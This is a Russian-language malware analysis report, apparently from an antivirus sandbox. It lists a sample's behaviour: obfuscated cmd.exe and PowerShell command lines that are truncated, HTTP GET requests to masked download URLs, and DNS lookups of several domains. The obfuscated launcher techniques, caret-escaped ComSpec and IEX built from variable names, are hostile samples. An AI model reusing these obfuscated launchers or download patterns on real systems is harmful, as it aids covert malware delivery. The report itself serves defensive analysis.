Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' FHGijSzT WUQjnzvEOPlXiucwubDi ZXnzRthNuVG & %C^om^S^pEc% %C^om^S^pEc% /V /c set %aMonZkTGrqKVGPM%=DkJnfmRDHAUIIp&&set %qXEmFlnOskt%=p&&set %rAYbkTzzSt%=ow...
Сетевая активность
Подключается к
- 'mu#####display-cases.eu':80
- 'ku######raum-urlaub-sylt.de':80
- 'ku######raum-urlaub-sylt.de':443
TCP
Запросы HTTP GET
- http://mu#####display-cases.eu/8W0D/
- http://ku######raum-urlaub-sylt.de/0Z6zA5Y/
Другие
- 'ku######raum-urlaub-sylt.de':443
UDP
- DNS ASK ve###plugg.com
- DNS ASK mu#####display-cases.eu
- DNS ASK ca####kadore.com
- DNS ASK ku######raum-urlaub-sylt.de
- DNS ASK de###nmis.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' FHGijSzT WUQjnzvEOPlXiucwubDi ZXnzRthNuVG & %C^om^S^pEc% %C^om^S^pEc% /V /c set %aMonZkTGrqKVGPM%=DkJnfmRDHAUIIp&&set %qXEmFlnOskt%=p&&set %rAYbkTzzSt%=ow...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " &((Get-vAriABLe '*Mdr*').Name[3,11,2]-jOIN'')( ( [RunTiMe.InteRopSerVicES.MaRshal]::ptrtOStriNgaNSi([ruNTiMe.inTErOpSErViCES.MarSHal]::sECUrEStrinGtoGlOBAlalLOcaNSI( $('76492d1116743f0423413b...
